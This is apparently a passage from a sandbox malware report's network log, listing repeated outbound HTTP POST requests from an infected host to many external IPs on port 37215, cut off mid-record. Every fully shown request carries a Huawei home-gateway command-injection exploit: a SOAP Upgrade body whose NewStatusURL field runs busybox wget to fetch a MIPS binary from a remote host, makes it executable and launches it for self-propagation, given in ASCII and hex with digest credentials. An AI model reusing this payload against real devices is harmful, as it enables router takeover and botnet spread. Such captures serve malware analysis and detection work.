                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          142192.168.2.234022841.136.43.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131731987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          143192.168.2.234022041.114.48.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131746054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          144192.168.2.2335084197.1.211.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131762981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          145192.168.2.2340746157.155.230.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131762981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          146192.168.2.2357948110.160.1.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131766081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          147192.168.2.2352544197.55.0.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.132900000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          148192.168.2.2334646197.154.56.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.132910013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          149192.168.2.2337766167.149.120.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.132913113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          150192.168.2.234149274.31.120.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135916948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          151192.168.2.235318841.174.25.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135924101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          152192.168.2.235947041.248.51.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.135976076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
